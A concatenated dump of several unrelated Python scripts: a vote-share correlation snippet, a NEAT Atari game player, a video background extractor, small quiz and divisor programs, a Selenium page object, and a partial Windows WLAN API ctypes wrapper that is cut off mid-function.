_=plt.plot(df_all_states['total_votes']/1000, df_all_states['dem_share'], marker='.', linestyle='none')
_=plt.xlabel('total votes(thousands)')
_=plt.ylabel('present of vote for obama')
plt.show()
#covariance - a measure of how quantities vary together. covarience=1/n(sum(Xi-Xmean).(Yi-Ymean))
#r= correlation = covarience/(std of x)(std of y)
covarience_matrix=np.cov(df_all_states['total_votes'], df_all_states['dem_share'])
print(covarience_matrix)
cov = covarience_matrix[0,1]
print(cov)
def pearson_r(x,y):
corr_mat=np.corroeff(x,y)
return corr_mat[0,1]
r=pearson_r(df_all_states['total_votes'], df_all_states['dem_share'])
print(r)
|
import gym
import torch
import DeepNEAT.NEAT_implementation.Population.population as population
#import DeepNEAT.configurations.TimePilot.timePilot as config
import DeepNEAT.configurations.Freeway.freeway as config
#import DeepNEAT.configurations.SpaceInvaders.spaceInvaders as config
from DeepNEAT.NEAT_implementation.Phenotype.feedForwardNetwork import FeedForwardNetwork
import time
from DeepNEAT.visualization.Visualization import draw_net
from DeepNEAT.NEAT_implementation.Genotype.genome import Genome
configuration = config.TimePilotConfig()
#configuration = config.FreewayConfig()
#configuration = config.SpaceInvadersConfig()
# OpenAI Gym
env = gym.make('TimePilot-ram-v0')
#env = gym.make('Freeway-ram-v0')
#env = gym.make('SpaceInvaders-ram-v0')
done = False
observation = env.reset()
fitness = 0
solution = torch.load("./Results/TimePilot/TimePilot_11")
#solution = torch.load("./Results/Freeway/Freeway_14")
#solution = torch.load("./Results/SpaceInvaders/SpaceInvaders_11")
phenotype = FeedForwardNetwork(solution, config.TimePilotConfig)
#phenotype = FeedForwardNetwork(solution, config.FreewayConfig)
#phenotype = FeedForwardNetwork(solution, config.SpaceInvadersConfig)
while not done:
env.render()
input = torch.Tensor([observation]).to(config.TimePilotConfig.DEVICE)
#input = torch.Tensor([observation]).to(config.FreewayConfig.DEVICE)
#input = torch.Tensor([observation]).to(config.SpaceInvadersConfig.DEVICE)
pred = torch.argmax(phenotype(input)[0]).numpy()
observation, reward, done, info = env.step(pred)
fitness += reward
print(fitness)
env.close()
|
from __future__ import print_function
import sys
import json
import cv2
import scipy
import matplotlib.pyplot as plt
def median_background(params):
input_video = params['input_video']
cap = cv2.VideoCapture(input_video)
cnt = 0
frame_list = []
while cap.isOpened():
ret, frame_bgr = cap.read()
if not ret:
break
frame_gry = cv2.cvtColor(frame_bgr,cv2.COLOR_BGR2GRAY)
# Select Region of interest
c0,c1 = params['roi_cols']
r0,r1 = params['roi_rows']
frame_gry = frame_gry[r0:r1,c0:c1]
if cnt%params['background_frame_skip'] == 0:
frame_list.append(frame_gry)
cv2.imshow('frame', frame_gry)
if cnt == 0 and params['background_check_roi']:
print()
print("Does ROI look ok? press q to quit and adjust or press any key to continue")
wait_val = 0
else:
wait_val = 1
if cv2.waitKey(wait_val) & 0xff == ord('q'):
cap.release()
cv2.destroyAllWindows()
sys.exit(0)
print('frame: {0}'.format(cnt))
cnt+=1
cap.release()
frame_array = scipy.array(frame_list)
frame_med = scipy.median(frame_array,0)
frame_med = frame_med.astype(scipy.uint8)
cv2.imshow('median',frame_med)
cv2.waitKey(0)
output_file = params['background_file']
cv2.imwrite(output_file,frame_med)
cv2.destroyAllWindows()
# -----------------------------------------------------------------------------
if __name__ == '__main__':
# Testing
params_file = sys.argv[1]
with open(params_file,'r') as f:
params = json.load(f)
median_background(params)
|
num = int(input())
for x in range(1,num+1):
if num%x==0:
print("Divisor: " + str(x))
|
import html
from data import get_questions
from question_model import Question
from quiz_brain import QuizBrain
difficulty = input("Choose your level(easy/medium/hard): ")
question_data = get_questions(difficulty)
question_bank = [Question(text=html.unescape(q['question']), answer=q['correct_answer']) for q in question_data]
host = QuizBrain(question_bank)
while host.questions_left():
host.next_question()
print("\n")
print("You've completed the quiz!")
print(f"Your final score was {host.score}/{host.question_number}")
|
from time import sleep
from selenium.common.exceptions import NoSuchElementException
from pages.base_page import BasePage
from pom.utils import wait_loop
class DashboardPage(BasePage):
def __init__(self):
BasePage.__init__(self)
def open_campaigns_page(self):
element = self.driver.find_element_by_xpath("//div[@class='nav main']//a[contains(@href,'campaigns')]"
"//div[@class='content']")
element.click()
def click_button_create_campaign(self):
button = self.driver.find_element_by_xpath("//div[@class='header-wrapper']"
"//button[@class='lp-button color-primary normal enabled']")
element = wait_loop(condition=lambda: button, timeout_seconds=10)
if not element:
raise NoSuchElementException("Missing element")
button.click()
sleep(4)
def verify_open_page(self, expected: str):
element = wait_loop(condition=lambda: self.driver.find_element_by_xpath("//div[@class='placeholder-pane-text']")
, timeout_seconds=10)
if not element:
raise NoSuchElementException("Missing element")
actual = element.text
assert actual == expected
def change_text(self):
element = self.driver.find_element_by_xpath("//div[@class='campaign-name-box']//div[@class='name']")
element.click()
element = self.driver.find_element_by_css_selector("input.lp-wrapped-text-input-field")
element.click()
element.clear()
element.send_keys("New Campaign Test")
button = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='Save']")
button.click()
def set_goal(self):
element = self.driver.find_element_by_xpath("//div[@class='options']//p[text()='Onboard']")
element = wait_loop(condition=lambda: element, timeout_seconds=10)
if not element:
raise NoSuchElementException("Missing element")
element.click()
def press_on_tab(self, tab_name: str):
element = self.driver.find_element_by_xpath("//div[@class='tab']//span[text()='" + tab_name + "']").click()
return element
def set_scheduled(self, option: str):
element = self.driver.find_element_by_xpath("//div[@class='options']//p[text()='" + option + "']")
sleep(2)
element.click()
element = self.driver.find_element_by_xpath("//div[@class='date-time']//i[@class='lp-icon']")
element = wait_loop(condition=lambda: element, timeout_seconds=10)
if not element:
raise NoSuchElementException("No")
element.click()
sleep(3)
element = self.driver.find_element_by_xpath("//div[@class='lp-calendar-week']//div[@class='lp-day']"
"//span[text()='8']")
element.click()
def set_push_notifications(self):
element = self.driver.find_element_by_xpath("//div[@class='composer-actions-kind-item']"
"//span[text()='Push Notification']")
sleep(2)
element.click()
element = self.driver.find_element_by_xpath("//div[@class='text-field-view']//input")
element.click()
element.clear()
element.send_keys("test")
def click_button_to_start_campaign(self, button_name: str):
element = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='" + button_name + "']")
sleep(2)
element.click()
def click_start_modal_button(self, button_name: str):
element = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='" + button_name + "']")
element.click()
def click_end_button(self, button_name: str):
element = self.driver.find_element_by_xpath("//button[@type='button']//span[text()='" + button_name + "']")
sleep(2)
element.click()
def click_end_modal_button(self, button_name: str):
element = self.driver.find_element_by_xpath("//div[@class='footer']//span[text()='" + button_name + "']")
element.click()
def verify_state(self, expected_state: str):
sleep(2)
actual = self.driver.find_element_by_xpath("//div[@class='navigation-bar-controls']//span").text
assert actual == expected_state, f'Actual state is: {actual} but expected is: {expected_state}'
def close_browser(self):
self.driver.quit()
|
""" wlan_api.py - Windows Wlan Native API interface module """
import binascii
import re
import xml.etree.ElementTree as ET
from ctypes import *
from ctypes.wintypes import *
from xml_util import xmlString
from common import hexDump
from tl_logger import TLLog,logOptions
log = TLLog.getLogger( 'wlan' )
class WlanException(Exception):
pass
def customresize(array, new_size):
return (array._type_*new_size).from_address(addressof(array))
wlanapi = windll.LoadLibrary('wlanapi.dll')
ERROR_SUCCESS = 0
class GUID(Structure):
_fields_ = [
('Data1', c_ulong),
('Data2', c_ushort),
('Data3', c_ushort),
('Data4', c_ubyte*8),
]
WLAN_INTERFACE_STATE = c_uint
(wlan_interface_state_not_ready,
wlan_interface_state_connected,
wlan_interface_state_ad_hoc_network_formed,
wlan_interface_state_disconnecting,
wlan_interface_state_disconnected,
wlan_interface_state_associating,
wlan_interface_state_discovering,
wlan_interface_state_authenticating) = map(WLAN_INTERFACE_STATE, xrange(0, 8))
dctWlanInterfaceStates = {
0 : 'not ready',
1 : 'connected',
2 : 'ad_hoc_network_formed',
3 : 'disconnecting',
4 : 'disconnected',
5 : 'associating',
6 : 'discovering',
7 : 'authenticating',
}
class WLAN_INTERFACE_INFO(Structure):
_fields_ = [
("InterfaceGuid", GUID),
("strInterfaceDescription", c_wchar * 256),
("isState", WLAN_INTERFACE_STATE)
]
def desc(self):
return self.strInterfaceDescription
def miniDesc(self):
lst = self.strInterfaceDescription.split()
return lst[0]
def shortDesc(self):
lst = self.strInterfaceDescription.split()
if len(lst) == 0:
desc = ''
elif len(lst) == 1:
desc = lst[0]
else:
desc = lst[0] + ' ' + lst[1]
return desc[0:20]
def getState(self):
return dctWlanInterfaceStates[self.isState]
def log(self):
log.debug( 'desc:%s state:%s' % (self.desc(),self.getState()))
def __str__(self):
return self.shortDesc()
class WLAN_INTERFACE_INFO_LIST(Structure):
_fields_ = [
("NumberOfItems", DWORD),
("Index", DWORD),
("InterfaceInfo", WLAN_INTERFACE_INFO * 1)
]
WLAN_MAX_PHY_TYPE_NUMBER = 0x8
DOT11_SSID_MAX_LENGTH = 32
WLAN_REASON_CODE = DWORD
DOT11_BSS_TYPE = c_uint
(dot11_BSS_type_infrastructure,
dot11_BSS_type_independent,
dot11_BSS_type_any) = map(DOT11_BSS_TYPE, xrange(1, 4))
DOT11_PHY_TYPE = c_uint
dot11_phy_type_unknown = 0
dot11_phy_type_any = 0
dot11_phy_type_fhss = 1
dot11_phy_type_dsss = 2
dot11_phy_type_irbaseband = 3
dot11_phy_type_ofdm = 4
dot11_phy_type_hrdsss = 5
dot11_phy_type_erp = 6
dot11_phy_type_ht = 7
dot11_phy_type_IHV_start = 0x80000000
dot11_phy_type_IHV_end = 0xffffffff
DOT11_AUTH_ALGORITHM = c_uint
DOT11_AUTH_ALGO_80211_OPEN = 1
DOT11_AUTH_ALGO_80211_SHARED_KEY = 2
DOT11_AUTH_ALGO_WPA = 3
DOT11_AUTH_ALGO_WPA_PSK = 4
DOT11_AUTH_ALGO_WPA_NONE = 5
DOT11_AUTH_ALGO_RSNA = 6
DOT11_AUTH_ALGO_RSNA_PSK = 7
DOT11_AUTH_ALGO_IHV_START = 0x80000000
DOT11_AUTH_ALGO_IHV_END = 0xffffffff
DOT11_CIPHER_ALGORITHM = c_uint
DOT11_CIPHER_ALGO_NONE = 0x00
DOT11_CIPHER_ALGO_WEP40 = 0x01
DOT11_CIPHER_ALGO_TKIP = 0x02
DOT11_CIPHER_ALGO_CCMP = 0x04
DOT11_CIPHER_ALGO_WEP104 = 0x05
DOT11_CIPHER_ALGO_WPA_USE_GROUP = 0x100
DOT11_CIPHER_ALGO_RSN_USE_GROUP = 0x100
DOT11_CIPHER_ALGO_WEP = 0x101
DOT11_CIPHER_ALGO_IHV_START = 0x80000000
DOT11_CIPHER_ALGO_IHV_END = 0xffffffff
WLAN_AVAILABLE_NETWORK_CONNECTED = 1
WLAN_AVAILABLE_NETWORK_HAS_PROFILE = 2
WLAN_AVAILABLE_NETWORK_INCLUDE_ALL_ADHOC_PROFILES = 0x00000001
WLAN_AVAILABLE_NETWORK_INCLUDE_ALL_MANUAL_HIDDEN_PROFILES = 0x00000002
class DOT11_SSID(Structure):
_fields_ = [
("SSIDLength", c_ulong),
("SSID", c_char * DOT11_SSID_MAX_LENGTH)
]
def __str__(self):
return self.SSID[0:self.SSIDLength]
class WLAN_AVAILABLE_NETWORK(Structure):
_fields_ = [
("ProfileName", c_wchar * 256),
("dot11Ssid", DOT11_SSID),
("dot11BssType", DOT11_BSS_TYPE),
("NumberOfBssids", c_ulong),
("NetworkConnectable", c_bool),
("wlanNotConnectableReason", WLAN_REASON_CODE),
("NumberOfPhyTypes", c_ulong),
("dot11PhyTypes", DOT11_PHY_TYPE * WLAN_MAX_PHY_TYPE_NUMBER),
("MorePhyTypes", c_bool),
("wlanSignalQuality", c_ulong),
("SecurityEnabled", c_bool),
("dot11DefaultAuthAlgorithm", DOT11_AUTH_ALGORITHM),
("dot11DefaultCipherAlgorithm", DOT11_CIPHER_ALGORITHM),
("Flags", DWORD),
("Reserved", DWORD)
]
def getProfileName(self):
return self.ProfileName
def getSSID(self):
return self.dot11Ssid
def getSignalQuality(self):
""" return signal quality """
return self.wlanSignalQuality
def getSignalQualityInDBM(self):
""" return signal quality in dbm.
wlanSignalQuality is percentage value that represents the signal quality of the network.
WLAN_SIGNAL_QUALITY is of type ULONG. This member contains a value between 0 and 100.
A value of 0 implies an actual RSSI signal strength of -100 dbm.
A value of 100 implies an actual RSSI signal strength of -50 dbm.
You can calculate the RSSI signal strength value for wlanSignalQuality values between 1 and 99
using linear interpolation."""
return (float(self.wlanSignalQuality) / 2.0) - 100.0
def isConnectable(self):
return self.NetworkConnectable
def isConnected(self):
return self.Flags & WLAN_AVAILABLE_NETWORK_CONNECTED
def hasProfile(self):
return self.Flags & WLAN_AVAILABLE_NETWORK_HAS_PROFILE
def isSecure(self):
return self.SecurityEnabled
def log(self):
log.debug( 'signal:%s (%f dbm)' % (self.getSignalQuality(),self.getSignalQualityInDBM()))
def __str__(self):
return 'ProfileName:%s ssid:%s bssType:%s' % (self.ProfileName,self.dot11Ssid,self.dot11BssType)
class WLAN_AVAILABLE_NETWORK_LIST(Structure):
_fields_ = [
("NumberOfItems", DWORD),
("Index", DWORD),
("Network", WLAN_AVAILABLE_NETWORK * 1),
]
WlanOpenHandle = wlanapi.WlanOpenHandle
WlanOpenHandle.argtypes = (DWORD, c_void_p, POINTER(DWORD), POINTER(HANDLE))
WlanOpenHandle.restype = DWORD
WlanCloseHandle = wlanapi.WlanCloseHandle
WlanCloseHandle.argtypes = (HANDLE,c_void_p)
WlanCloseHandle.restype = DWORD
WlanEnumInterfaces = wlanapi.WlanEnumInterfaces
WlanEnumInterfaces.argtypes = (HANDLE, c_void_p,
POINTER(POINTER(WLAN_INTERFACE_INFO_LIST)))
WlanEnumInterfaces.restype = DWORD
WlanGetAvailableNetworkList = wlanapi.WlanGetAvailableNetworkList
WlanGetAvailableNetworkList.argtypes = (HANDLE, POINTER(GUID), DWORD, c_void_p,
POINTER(POINTER(WLAN_AVAILABLE_NETWORK_LIST)))
WlanGetAvailableNetworkList.restype = DWORD
WlanFreeMemory = wlanapi.WlanFreeMemory
WlanFreeMemory.argtypes = [c_void_p]
WlanDisconnect = wlanapi.WlanDisconnect
WlanDisconnect.argtypes = (HANDLE, POINTER(GUID), c_void_p)
WlanDisconnect.restype = DWORD
WLAN_CONNECTION_MODE = c_ubyte
wlan_connection_mode_profile = 0
wlan_connection_mode_temporary_profile = 1
wlan_connection_mode_discovery_secure = 2
wlan_connection_mode_discovery_unsecure = 3
wlan_connection_mode_auto = 4
wlan_connection_mode_invalid = 5
class NDIS_OBJECT_HEADER(Structure):
"""
typedef struct _NDIS_OBJECT_HEADER {
UCHAR Type;
UCHAR Revision;
USHORT Size;
} NDIS_OBJECT_HEADER, *PNDIS_OBJECT_HEADER;
"""
_fields_ = [
("Type", c_ubyte),
("Revision", c_ubyte),
("Size", USHORT),
]
class DOT11_MAC_ADDRESS(Structure):
"""
typedef UCHAR DOT11_MAC_ADDRESS[6];
typedef DOT11_MAC_ADDRESS* PDOT11_MAC_ADDRESS;
"""
_fields_ = [
("macAddr", c_ubyte*6),
]
class DOT11_BSSID_LIST(Structure):
"""
typedef struct _DOT11_BSSID_LIST {
NDIS_OBJECT_HEADER Header;
ULONG uNumOfEntries;
ULONG uTotalNumOfEntries;
DOT11_MAC_ADDRESS BSSIDs[1];
} DOT11_BSSID_LIST, *PDOT11_BSSID_LIST;
"""
_fields_ = [
("Header", NDIS_OBJECT_HEADER),
("uNumOfEntries", ULONG),
("uTotalNumOfEntries", ULONG),
("BSSIDs", DOT11_MAC_ADDRESS * 1),
]
class WLAN_CONNECTION_PARAMETERS(Structure):
"""
typedef struct _WLAN_CONNECTION_PARAMETERS {
WLAN_CONNECTION_MODE wlanConnectionMode;
LPCWSTR strProfile;
PDOT11_SSID pDot11Ssid;
PDOT11_BSSID_LIST pDesiredBssidList;
DOT11_BSS_TYPE dot11BssType;
DWORD dwFlags;
} WLAN_CONNECTION_PARAMETERS, *PWLAN_CONNECTION_PARAMETERS;
"""
_fields_ = [
("wlanConnectionMode", WLAN_CONNECTION_MODE),
("strProfile", c_wchar_p),
("dot11Ssid", POINTER(DOT11_SSID)),
("desiredBssidList", POINTER(DOT11_BSSID_LIST)),
("dot11BssType", DOT11_BSS_TYPE),
("Flags", DWORD),
]
#DWORD WINAPI WlanConnect(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_ const PWLAN_CONNECTION_PARAMETERS pConnectionParameters,
#_Reserved_ PVOID pReserved
#);
WlanConnect = wlanapi.WlanConnect
WlanConnect.argtypes = (HANDLE, POINTER(GUID), POINTER(WLAN_CONNECTION_PARAMETERS), c_void_p)
WlanConnect.restype = DWORD
#DWORD WINAPI WlanGetProfile(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_ LPCWSTR strProfileName,
#_Reserved_ PVOID pReserved,
#_Out_ LPWSTR *pstrProfileXml,
#_Inout_opt_ DWORD *pdwFlags,
#_Out_opt_ PDWORD pdwGrantedAccess
#);
WlanGetProfile = wlanapi.WlanGetProfile
WlanGetProfile.argtypes = (HANDLE, POINTER(GUID), c_wchar_p, c_void_p, POINTER(c_wchar_p), POINTER(DWORD), POINTER(DWORD))
WlanGetProfile.restype = DWORD
WlanSetProfile = wlanapi.WlanSetProfile
WlanSetProfile.restype = DWORD # DWORD WINAPI WlanSetProfile(
WlanSetProfile.argtypes = (HANDLE, # _In_ HANDLE hClientHandle,
POINTER(GUID), # _In_ const GUID *pInterfaceGuid,
DWORD, # _In_ DWORD dwFlags,
c_wchar_p, # _In_ LPCWSTR strProfileXml,
c_wchar_p, # _In_opt_ LPCWSTR strAllUserProfileSecurity,
BOOL, # _In_ BOOL bOverwrite,
c_void_p, # _Reserved_ PVOID pReserved,
POINTER(DWORD) # _Out_ DWORD *pdwReasonCode
) #);
#DWORD WINAPI WlanDeleteProfile(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_ LPCWSTR strProfileName,
#_Reserved_ PVOID pReserved
#);
WlanDeleteProfile = wlanapi.WlanDeleteProfile
WlanDeleteProfile.restype = DWORD
WlanDeleteProfile.argtypes = (HANDLE,
POINTER(GUID),
c_wchar_p,
c_void_p)
class WLAN_RAW_DATA(Structure):
"""
typedef struct _WLAN_RAW_DATA {
DWORD dwDataSize;
BYTE DataBlob[1];
} WLAN_RAW_DATA, *PWLAN_RAW_DATA;
"""
_fields_ = [
("dwDataSize", DWORD),
("DataBlob ", BYTE * 1),
]
#DWORD WINAPI WlanScan(
#_In_ HANDLE hClientHandle,
#_In_ const GUID *pInterfaceGuid,
#_In_opt_ const PDOT11_SSID pDot11Ssid,
#_In_opt_ const PWLAN_RAW_DATA pIeData,
#_Reserved_ PVOID pReserved
#);
WlanScan= wlanapi.WlanScan
WlanScan.restype = DWORD
WlanScan.argtypes = (HANDLE,
POINTER(GUID),
POINTER(DOT11_SSID),
POINTER(WLAN_RAW_DATA),
c_void_p)
#DWORD WlanReasonCodeToString(
#_In_ DWORD dwReasonCode,
#_In_ DWORD dwBufferSize,
#_In_ PWCHAR pStringBuffer,
#_Reserved_ PVOID pReserved
#);
WlanReasonCodeToString=wlanapi.WlanReasonCodeToString
WlanScan.restype = DWORD
WlanScan.argtypes = (DWORD,
DWORD,
c_wchar_p,
c_void_p)
def getWlanReasonCodeString(reasonCode):
""" return the reason code string """
rcStr = ''
try:
buf = create_unicode_buffer(256)
bufSize = DWORD(256)
ret = WlanReasonCodeToString( reasonCode, bufSize, buf, None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
rcStr = buf.value
except Exception,err:
print 'getWlanReasonCodeString() fail - err %s' % err
rcStr = '**'
return rcStr
WLAN_NOTIFICATION_SOURCE_NONE = 0
WLAN_NOTIFICATION_SOURCE_ONEX = 0x00000004
WLAN_NOTIFICATION_SOURCE_ACM = 0x00000008
WLAN_NOTIFICATION_SOURCE_MSM = 0x00000010
WLAN_NOTIFICATION_SOURCE_SECURITY = 0x00000020
WLAN_NOTIFICATION_SOURCE_IHV = 0x00000040
WLAN_NOTIFICATION_SOURCE_HNWK = 0x00000080
WLAN_NOTIFICATION_SOURCE_ALL = 0x0000FFFF
class WLAN_NOTIFICATION_DATA(Structure):
"""
typedef struct _WLAN_NOTIFICATION_DATA {
DWORD NotificationSource;
DWORD NotificationCode;
GUID InterfaceGuid;
DWORD dwDataSize;
PVOID pData;
} WLAN_NOTIFICATION_DATA, *PWLAN_NOTIFICATION_DATA;
"""
_fields_ = [
("NotificationSource", DWORD),
("NotificationCode", DWORD),
("InterfaceGuid", GUID),
("dwDataSize", DWORD),
("pData", BYTE * 1),
]
def __str__(self):
return 'source:0x%X code:%s InferfaceGuid:%s dwDataSize:%s' % (self.NotificationSource, self.NotificationCode, self.InterfaceGuid, self.dwDataSize)
#DWORD WINAPI WlanRegisterNotification(
#_In_ HANDLE hClientHandle,
#_In_ DWORD dwNotifSource,
#_In_ BOOL bIgnoreDuplicate,
#_In_opt_ WLAN_NOTIFICATION_CALLBACK funcCallback,
#_In_opt_ PVOID pCallbackContext,
#_Reserved_ PVOID pReserved,
#_Out_opt_ PDWORD pdwPrevNotifSource
#);
NOTIFY_FUNC = CFUNCTYPE(c_voidp, POINTER(WLAN_NOTIFICATION_DATA), POINTER(c_int))
#NOTIFY_FUNC = WINFUNCTYPE(c_voidp, POINTER(WLAN_NOTIFICATION_DATA), POINTER(c_int))
WlanRegisterNotification=wlanapi.WlanRegisterNotification
WlanRegisterNotification.restype = DWORD
WlanRegisterNotification.argtypes = (HANDLE,
DWORD,
c_bool,
NOTIFY_FUNC,
c_void_p,
c_void_p,
POINTER(DWORD))
def wlanNotificationCallback(pData, pVoid):
""" Wlan notification callback """
msg1 = 'wlanNotificationCallback() pData:%s' % pData.contents
#msg2 = 'wlanNotificationCallback() pVoid:%s' % pVoid.contents
log.info( msg1 )
#log.info( msg2 )
print msg1
#print msg2
class WlanMemory(object):
""" Base class used when the wlanapi returns data that needs to be deleted with WlanFreeMemory()
__enter__ and __exit__ have been implemented so that the with statement can be used to
automatically free the memory.
the delete() method will also delete the memory used.
"""
def __init__(self, pData):
self._pData = pData
log.debug('WlanMemory __init__() - pData:%s' % self._pData)
def delete(self):
if self._pData:
log.debug('WlanMemory delete() - pData:%s' % self._pData)
WlanFreeMemory(self._pData)
self._pData = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.delete()
def _custom_resize(self, array, new_size):
return (array._type_*new_size).from_address(addressof(array))
class WlanInterfaceInfoData(WlanMemory):
def __init__(self, pData):
WlanMemory.__init__(self, pData)
self.ifaces = self._custom_resize( self._pData.contents.InterfaceInfo,
self._pData.contents.NumberOfItems)
def __len__(self):
return len(self.ifaces)
def __getitem__(self, key):
return self.ifaces[key]
def getInterface(self, miniDesc):
""" return an interface using miniDesc name """
for iface in self.ifaces:
if iface.miniDesc() == miniDesc:
return iface
else:
raise Exception('Interface with miniDesc "%s" not found' % miniDesc)
def __iter__(self):
return iter(self.ifaces)
class WlanAvailableNetworkListData(WlanMemory):
def __init__(self, pData):
WlanMemory.__init__(self, pData)
avail_net_list = self._pData.contents
self.networks = self._custom_resize( avail_net_list.Network, avail_net_list.NumberOfItems)
def __len__(self):
return len(self.networks)
def __getitem__(self, key):
return self.networks[key]
def getProfile(self, profile):
""" return network with profile name """
for network in self.networks:
if network.getProfileName() == profile:
return network
else:
raise Exception('Network with profile name "%s" not found' % profile)
def getSSID(self, ssid):
""" return network using ssid """
for network in self.networks:
if network.getSSID() == ssid:
return network
else:
raise Exception('Network with SSID "%s" not found' % profile)
def __iter__(self):
return iter(self.networks)
class WlanInterface(object):
""" wraps the wlanapi for all wlan operations
Some wlanapi commands return memory that needs to be deleted with a call to WlanFreeMemory()
enumInterfaces(), getAvailableNetworks()
The wlan memory used will always be return in a class inherited from WlanMemory
Use the python 'with' statement to scope the usage and then the memory is free'd automatically
"""
def __init__(self, openHandle=True, useCallback=False):
self._useCallback = useCallback
self._handle = None
self._lstIfaces = None
self._prevSources = 0
self._funcCallback = None
if openHandle:
self.openHandle()
def openHandle(self):
""" open handle to Wlan """
NegotiatedVersion = DWORD()
self._handle = HANDLE()
log.debug('WlanOpenHandle()')
ret = WlanOpenHandle(1, None, byref(NegotiatedVersion), byref(self._handle))
if ret != ERROR_SUCCESS:
raise WinError(ret)
if self._useCallback:
self.createNotificationCallback(sources=WLAN_NOTIFICATION_SOURCE_ALL)
def updateDesc(self, wlanIfData=None):
""" update the description string """
if wlanIfData:
self._lstIfaces = [str(iface) for iface in wlanIfData.ifaces]
else:
with self.enumInterfaces() as wlanIfData:
self._lstIfaces = [str(iface) for iface in wlanIfData.ifaces]
def close(self):
# free all memory used and close handle
if self._handle is not None:
if self._funcCallback is not None:
self.createNotificationCallback(clearAll=True)
log.debug('WlanCloseHandle() handle:%s' % self._handle)
ret = WlanCloseHandle(self._handle, None )
if ret != ERROR_SUCCESS:
raise WinError(ret)
self._handle = None
def createNotificationCallback(self, sources=WLAN_NOTIFICATION_SOURCE_ALL, ignoreDups=False, clearAll=False):
log.debug('createNotificationCallback() - sources:0x%X ignoreDups:%s clearAll:%s' % (sources,ignoreDups,clearAll))
if clearAll:
dwNotifySource = DWORD( WLAN_NOTIFICATION_SOURCE_NONE )
#funcCallback = None
self._funcCallback = NOTIFY_FUNC(wlanNotificationCallback)
pCallbackContext = POINTER(c_int)()
else:
dwNotifySource = DWORD( sources )
self._funcCallback = NOTIFY_FUNC(wlanNotificationCallback)
pCallbackContext = POINTER(c_int)()
bIgnoreDups = BOOL(ignoreDups)
dwPrevSources = DWORD(self._prevSources)
ret = WlanRegisterNotification(self._handle,
dwNotifySource,
bIgnoreDups,
self._funcCallback,
pCallbackContext,
None,
byref(dwPrevSources))
if ret != ERROR_SUCCESS:
raise WindowsError(ret)
self._prevSources = sources
if clearAll:
self._funcCallback = None
def enumInterfaces(self):
# free interface memory if already allocated
log.debug('WlanInterface enumInterfaces()')
# find all wireless network interfaces
_pInterfaceList = pointer(WLAN_INTERFACE_INFO_LIST())
ret = WlanEnumInterfaces(self._handle, None, byref(_pInterfaceList))
if ret != ERROR_SUCCESS:
raise WinError(ret)
# return to caller
return WlanInterfaceInfoData(_pInterfaceList)
def getAvailableNetworks(self, iface):
log.debug('WlanInterface getAvailableNetworks()')
dwFlags = DWORD(3)
_pAvailableNetworkList = pointer(WLAN_AVAILABLE_NETWORK_LIST())
ret = WlanGetAvailableNetworkList( self._handle,
byref(iface.InterfaceGuid),
dwFlags,
None,
byref(_pAvailableNetworkList))
if ret != ERROR_SUCCESS:
raise WinError(ret)
return WlanAvailableNetworkListData(_pAvailableNetworkList)
def wlanConnect(self, iface, profile):
""" connect a wlan interface using a profile """
log.debug('WlanInterface wlanConnect() - iface:%s profile:"%s"' % (iface.miniDesc(), profile))
wcp = WLAN_CONNECTION_PARAMETERS()
wcp.wlanConnectMode = wlan_connection_mode_profile
wcp.strProfile = profile
wcp.pDot11Ssid = None # byref(ssid)
wcp.pDesiredBssidList = None
wcp.dot11BssType = 1
wcp.dwFlags = 0
ret = WlanConnect( self._handle,
byref(iface.InterfaceGuid),
byref(wcp),
None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanDisconnect(self, iface):
""" disconnect a wlan interface """
log.debug('WlanInterface wlanDisconnect() - iface:%s' % (iface.miniDesc()))
ret = WlanDisconnect( self._handle,
byref(iface.InterfaceGuid),
None)
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanGetProfile(self, iface, profile, saveToFile=None):
""" return profile XML for a defined profile """
log.debug('WlanInterface wlanGetProfile() - profile:"%s" saveToFile:%s' % (profile,saveToFile))
sProfile = c_wchar_p(profile)
sProfileXML = c_wchar_p() # create_unicode_buffer(1024)
flags = DWORD(0)
grantedAccess = DWORD()
ret = WlanGetProfile( self._handle,
byref(iface.InterfaceGuid),
sProfile,
None,
byref(sProfileXML),
byref(flags),
byref(grantedAccess))
if ret != ERROR_SUCCESS:
raise WinError(ret)
profileXML = sProfileXML.value
if saveToFile:
open(saveToFile,'w').write(profileXML)
return profileXML
def wlanSetProfile(self, iface, profileXML, overwrite=True):
""" return profile XML for a defined profile """
log.debug('WlanInterface wlanSetProfile()')
flags = DWORD(0)
sProfileXML = c_wchar_p(profileXML)
dwReasonCode = DWORD()
bOverwrite = BOOL(overwrite)
ret = WlanSetProfile( self._handle,
byref(iface.InterfaceGuid),
flags,
sProfileXML,
None,
bOverwrite,
None,
byref(dwReasonCode))
log.debug('wlanSetProfile() reasonCode:%s' % getWlanReasonCodeString( dwReasonCode ))
if ret != ERROR_SUCCESS:
raise WinError(ret)
def wlanCopyProfile(self, iface, profile, newProfile, ssid=None, pass_phrase=None, saveOrigProfile=None, saveNewProfile=None):
""" Create a new profile from an existing profile
Changes in the new profile:
change the profile name in <WLANProfile>
remove the hex element in <SSID>
if ssid argument is set:
change the name element in <SSID> to new SSID name
if pass_phrase argument is set:
change the protected element from true to false in <sharedKey>
change the keyMaterial element to the new pass phrase in <sharedKey>
"""
sXML = self.wlanGetProfile(iface, profile, saveToFile=saveOrigProfile)
#print sXML
reProf = re.compile('<{0}>.*</{0}>'.format('name'))
reProf2 = re.compile('<{0}>.*</{0}>'.format('name2'))
reHex = re.compile('<{0}>.*</{0}>'.format('hex'))
reProt = re.compile('<{0}>.*</{0}>'.format('protected'))
reKeyM = re.compile('<{0}>.*</{0}>'.format('keyMaterial'))
sNewXML = sXML
# change the name of the profile
sNewXML = reProf.sub('<{0}>{1}</{0}>'.format( 'name2',newProfile), sNewXML, 1)
# remove the hex element in <SSID>
sNewXML = reHex.sub('', sNewXML, 1)
if ssid is not None:
# change the name element in <SSID> to new SSID name
sNewXML = reProf.sub('<{0}>{1}</{0}>'.format( 'name',ssid), sNewXML, 1)
